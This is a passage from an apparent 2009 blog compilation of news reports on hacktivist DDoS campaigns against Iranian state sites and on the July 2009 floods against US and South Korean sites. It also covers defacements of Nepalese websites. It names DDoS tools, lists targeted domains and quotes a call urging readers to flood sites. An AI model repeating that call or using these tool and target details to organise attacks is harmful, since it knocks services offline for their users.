Moreover, the ongoing distributed denial of service attacks, are using techniques which greatly resemble those used in last year’s Russia vs Georgia cyber attack, and the ones Chinese hacktivists used back in 2008 in order to temporarily shut down CNN, with a single exception - there’s no indication of a botnet involvement in the present attack.<br />
<br />
Instead, the attack relies on the so called people’s information warfare concept, which is the self-mobilization of individuals, or their recruitment based on political/nationalistic sentiments by a third-party, for conducting various hacktivism activities such as web site defacements, or launching distributed denial of service attacks.<br />
<br />
The following are some of the sites that are currently under attack, remain totally unresponsive, or return “server is too busy” error messages:<br />
<br />
Ahmadinejad.ir - Mahmoud Ahmadinejad’s Official Blog - under attack<br />
Leader.ir - Office of the Supreme Leader, Sayyid Ali Khamenei - under attack<br />
President.ir - Presidency of The Islamic Republic - under attack<br />
Farsnnews.com - Fars News Agency - under attack<br />
Irib.ir - Islamic Republic of Iran Broadcasting - under attack<br />
Kayhannews.ir - News Portal - “Service Unavailable”<br />
Irna.ir - Islamic Republic News Agency - “service unavailable”<br />
Mfa.gov.ir - Ministry of foreign affairs , Islamic Republic of Iran - under attack<br />
Moi.ir - Ministry of Interior - under attack<br />
Police.ir - National Police - under attack<br />
Justice.ir - Ministry of Justice - under attack<br />
Presstv.ir - Iranian Press TV - “server is too busy”<br />
<br />
Among the first web-based denial of service attack used, is a tool called “Page Rebooter” which is basically allowing everyone to set an interval for refreshing a particular page, in this case it’s 1 second. Pre-defined links to the targeted sites were then distributed across Twitter and the Web, through messages link the following :<br />
<br />
“Please spread word about a cyber effort to exert pressure on the paramilitary in Iran. They have launched denial of service attacks on US websites that are run by live bloggers feeding us up to the minute information about what is going on in Iran on the ground. To fight back, open these two URLs in as many tabs/windows as possible and simply leave your computer running overnight! We must show solidarity with them in their quest for freedom! The 2nd link targets PressTV, the mouthpiece of Ahmadinejad and Khamenei.”<br />
<br />
The second stage of the campaign consisted in the distribution of a multiple iFrame loading script which was automatically refreshing farsnews.com, irna.ir and rajanews.com. The script has since changed its location and is advertised under a new domain.<br />
<br />
The third stage included a combined attack, this time including DIY (do-it-yourself) denial of service tools (DDoS), which despite their primitive nature are indeed causing server overload for their targets. Each of the tools is distributed with a simple manual, including links to large images at the targeted web sites, one which the software using proxies will attempt to obtain automatically.<br />
<br />
The tools themselves, BWRaeper.exe (detected as Worm.AutoIt.AA); PingFlooder.exe (flagged as banker malware); Server_Attack_By-_C-4.exe (Riskware.ServerAttack.F) and SupportIran.php, have already been picked up by antivirus vendors. The last tool is a basic PHP script targeting those running a server that supports PHP in order to use it.<br />
<br />
SupportIran.php has also been released as an improved version to the multiple iFrame loader, and is currently used in the attack as well, having the following sites pre-defined to attack simultaneously - khamenei.ir; presstv.ir; irna.ir; president.ir; mfa.gov.ir; moi.ir; police.ir; justice.ir; live.irib.ir.<br />
<br />
There have already been speculations that the magnitude of these local attacks — Iranian users targeting Iranian web sites – is contributing to the “strange changes in Iranian traffic transit” reported during the last couple of days. The attacks are still ongoing. </span></h2><h2><span style="font-size: small; font-weight: normal;"> </span></h2><h2><a href="http://hackernepal.blogspot.com/2009/10/government-and-private-companies.html">7.Government And Private Companies Websites Struggle Against DDoS Attacks</a></h2><h2><span style="font-size: small;">Websites belonging to the federal government, regulatory agencies and private companies have been struggling against sustained online attacks that began on the Independence Day holiday, according to multiple published reports.<br />
<br />
At time of writing, most of the targets appeared to be afloat. Nonetheless, several targets have buckled under the DDoS, or distributed denial of service, attacks, which try to bring down a website by bombarding it with more traffic than it can handle. FTC.gov was experiencing “technical issues” on Monday and Tuesday that prevented many people from reaching the site, spokesman Peter Kaplan said.<br />
<br />
Other sites, including FAA.gov, Treas.gov and DOT.gov also experienced outages. DOT spokeswoman Sasha Johnson said late Tuesday: “The DOT has been experiencing network incidents since this past weekend. We are working with the US Computer Emergency Readiness Team at this time.”<br />
<br />
Both Kaplan and Johnson declined to say whether their agencies’ sites were under attack.<br />
<br />
The DDoS attacks appear to be originating from compromised computers located primarily in the Asia Pacific region and are being delivered as plain-vanilla floods of ping, syn and UDP packets, said the person, who asked not to be identified because he wasn’t authorized to share the details.<br />
<br />
The attacks came as South Korean websites operated by the government and private companies also were hit, the Associated Press reports. In all, 26 websites, including those run by Nasdaq, the New York Stock Exchange and the Washington Post are being targeted, according to The Washington Post, which also covered the attacks.<br />
<br />
There seems to be some confusion about just how powerful the attacks are. The person familiar with the attacks said they were relatively modest.<br />
<br />
“Most are easy to mitigate,” the person familiar with them said. “I’m surprised any of these attacks are as effective as they are.”<br />
<br />
But an unidentified person briefed by government investigators told IDG News the attacks directed as much as 20 gigabytes to 40 gigabytes of bandwidth per second during their height over the weekend. They have since settled down to about 1.2 gigabytes per second, IDG said.<br />
<br />
Credit: The Register<br />
<br />
Update (July 09): It seems there is still a DDoS attack against a number of websites, most of them belong to US and South Korea goverment sites. The malware involved in the attack has been detected as Mydoom.HN. This is the list of URLs that is targeting:<br />
<br />
www.president.go.kr<br />
www.mnd.go.kr<br />
www.mofat.go.kr<br />
www.assembly.go.kr<br />
www.usfk.mil<br />
blog.naver.com<br />
mail.naver.com<br />
banking.nonghyup.com<br />
ezbank.shinhan.com<br />
ebank.keb.co.kr<br />
www.hannara.or.kr<br />
www.chosun.com<br />
www.auction.co.kr<br />
www.whitehouse.gov<br />
www.faa.gov<br />
www.dhs.gov<br />
www.state.gov<br />
www.voanews.com<br />
www.defenselink.mil<br />
www.nyse.com<br />
www.nasdaq.com<br />
finance.yahoo.com<br />
www.usauctionslive.com<br />
www.usbank.com<br />
www.washingtonpost.com<br />
www.ustreas.gov<br />
whitehouse.gov<br />
faa.gov<br />
evisaforms.state.gov<br />
www.moneyfactory.gov<br />
www.dot.gov<br />
www.ftc.gov<br />
www.nsa.gov<br />
www.usps.gov<br />
www.voa.gov<br />
www.yahoo.com<br />
travel.state.gov<br />
www.nyse.com<br />
www.site-by-site.com<br />
www.marketwatch.com<br />
www.amazon.com </span></h2><h2><span style="font-size: small;"></span></h2><h2><a href="http://hackernepal.blogspot.com/2009/10/nepal-supreme-court-website-compromised.html">8.Nepal Supreme Court Website Compromised And Became Porn Video Hoster</a></h2><h2 style="font-weight: normal;"><span style="font-size: small;">Nepal Supreme Court Website Compromised And Became Porn Video Hoster<br />
<br />
Another government site recently became a victim of an attack, this time the website of the Supreme Court of Nepal. The site was compromised due to SQL injection or XSS flaw, most likely enabled by the site’s use of an older Web server application version.<br />
<br />
After being hacked, this website was turned into a host for pornographic video, in particular a site named “porno tv”. Before being cleaned up, this site also included about 157 other adult links. Other than links, the hacked site also displayed a login page that can be used to gather email addresses for possible spam distribution.<br />
<br />
The injected folder with adult HTML files contained the porn files, but surprisingly did not contain any malware as when TrendLabs discovered it.<br />
<br />
TrendLabs have informed the owners of the said site of their findings and according to TrendLabs, the site is already clean. </span></h2><h2 style="font-weight: normal;"><span style="font-size: small;"><br />
</span><span style="color: #990000; font-size: large;">8. neplese gov web....</span></h2><h2 style="font-weight: normal;"><span style="font-size: small;">Only about 3 weeks before Nepalese government website was hacked by Iranian Hacker but today I was surprised again when my friend sends me a link of Hacked website. Nepali video sharing site Merovideo.com has bee hacked by Maniac Hacker.<br />
Click read more for more details<br />
Photobucket<br />
I am not sure where from hacker are but according to their single page website we can guess it might from Turkey. I have send mail to admin of this site. Hope he can make it quick repair. </span></h2><h2 style="font-weight: normal;"><span style="font-size: small;"><br />
</span></h2><h2><a href="http://hackernepal.blogspot.com/2009/10/nepali-website-is-hacked-again.html">9.Nepali website is hacked again</a></h2><h2 style="font-weight: normal;"><span style="font-size: small;">Nepali website is hacked again..one of the top nepali Video sharing Site has been hacked again .this time its MEROVIDEO.COM .<br />
<br />
According to the news ..this site is hacked by a Iranian Hacker..Maniac Hacker.<br />
<br />
please check this video for full information...<br />
<br />
Download the latest Flash Player™ here.<br />
<br />
Click read more for more details<br />
Photobucket<br />
You Might like this also <br />
<br />
</span><span style="font-size: small;"><br />
<br />
<iframe allowtransparency="true" frameborder="0" height="90" hspace="0" marginheight="0" marginwidth="0" name="ch_ad296" scrolling="no" src="http://mm.chitika.net/minimall?w=468&h=90&client=eblogtemplates&noctxt=1&sid=langit-template&url=http%3A//hackernepal.blogspot.com/2009/10/iranian-opposition-launches-organized.html&type=rpu&nosearch=1&noprice=1&cl_title=2277DD&fn_title=Arial&fn_text=Arial&ref=http%3A//hackernepal.blogspot.com/2009/10/ladyboydollscom-website-attacked-by.html&shqueries=1&cb=296" vspace="0" width="468"></iframe><br />
</span> <script type="text/javascript">
<!--
ch_client = "eblogtemplates";
ch_type = "rpu";
ch_noprice = "1";
ch_shufflequeries = 1;
ch_width = 468;
ch_height = 90;
ch_color_title = "2277DD";
ch_non_contextual = 1;
ch_nosearch = 1 ;
ch_font_title = "Arial";
ch_font_text = "Arial";
ch_sid = "langit-template";
var ch_queries = new Array( );
var ch_selected=Math.floor((Math.random()*ch_queries.length));
if ( ch_selected < ch_queries.length ) {
ch_query = ch_queries[ch_selected];
}
//-->
</script> <script src="http://scripts.chitika.net/eminimalls/mm.js" type="text/javascript">
</script> </h2><h2 style="font-weight: normal;"><span style="font-size: small;"> </span></h2><script src="http://scripts.chitika.net/eminimalls/mm.js" type="text/javascript">
</script><span style="font-size: small;"><iframe allowtransparency="true" frameborder="0" height="90" hspace="0" marginheight="0" marginwidth="0" name="ch_ad75" scrolling="no" src="http://mm.chitika.net/minimall?w=468&h=90&client=eblogtemplates&noctxt=1&sid=langit-template&url=http%3A//hackernepal.blogspot.com/2009/10/nepali-website-in-japan-hacked.html&type=rpu&nosearch=1&noprice=1&cl_title=2277DD&fn_title=Arial&fn_text=Arial&ref=http%3A//hackernepal.blogspot.com/2009/10/nepali.html&shqueries=1&cb=75" vspace="0" width="468"></iframe><br />
</span><div class="blogger-post-footer">http://hackernepal.blogspot.com/feeds/posts/default</div>hanghttp://www.blogger.com/profile/12012311240848972404noreply@blogger.com0